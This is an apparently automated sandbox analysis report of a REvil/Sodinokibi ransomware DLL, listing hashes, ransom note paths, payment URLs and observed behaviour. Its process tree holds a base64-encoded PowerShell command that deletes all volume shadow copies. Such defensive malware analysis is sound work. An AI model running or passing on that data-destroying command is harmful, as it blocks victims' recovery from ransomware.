Analysis
-
max time kernel
151s -
max time network
186s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-06-2022 14:37
Static task
static1
Behavioral task
behavioral1
Sample
12bb06bc5da9d7f24634bb37a809ad69896c2eb47b7957846124fe09fbf573bf.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
12bb06bc5da9d7f24634bb37a809ad69896c2eb47b7957846124fe09fbf573bf.dll
Resource
win10v2004-20220414-en
General
-
Target
12bb06bc5da9d7f24634bb37a809ad69896c2eb47b7957846124fe09fbf573bf.dll
-
Size
164KB
-
MD5
b4fe61c29e23014fdab44ad0d8df1d2d
-
SHA1
2b76199d726a16d3c25d74b3562fa3bdf4bd3d52
-
SHA256
12bb06bc5da9d7f24634bb37a809ad69896c2eb47b7957846124fe09fbf573bf
-
SHA512
e54d0113f866a210371f49c4d79f844259cbc58bfbd198a16c7d7ce223d18ad0ba6f5c1cf9b93629b97f8062ef4955e9bdce7ea53256029de1a93c88bc382acf
Malware Config
Extracted
C:\z63wvyk-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AAA8E56BDA1A76E9
http://decryptor.top/AAA8E56BDA1A76E9
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\X: rundll32.exe -
Drops file in Program Files directory 2 IoCs
Processes:
rundll32.exedescription ioc process File created \??\c:\program files\z63wvyk-readme.txt rundll32.exe File created \??\c:\program files (x86)\z63wvyk-readme.txt rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 2200 rundll32.exe 2200 rundll32.exe 4600 powershell.exe 4600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4600 powershell.exe Token: SeBackupPrivilege 4684 vssvc.exe Token: SeRestorePrivilege 4684 vssvc.exe Token: SeAuditPrivilege 4684 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 3928 wrote to memory of 2200 3928 rundll32.exe rundll32.exe PID 3928 wrote to memory of 2200 3928 rundll32.exe rundll32.exe PID 3928 wrote to memory of 2200 3928 rundll32.exe rundll32.exe PID 2200 wrote to memory of 4600 2200 rundll32.exe powershell.exe PID 2200 wrote to memory of 4600 2200 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\12bb06bc5da9d7f24634bb37a809ad69896c2eb47b7957846124fe09fbf573bf.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\12bb06bc5da9d7f24634bb37a809ad69896c2eb47b7957846124fe09fbf573bf.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2808
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684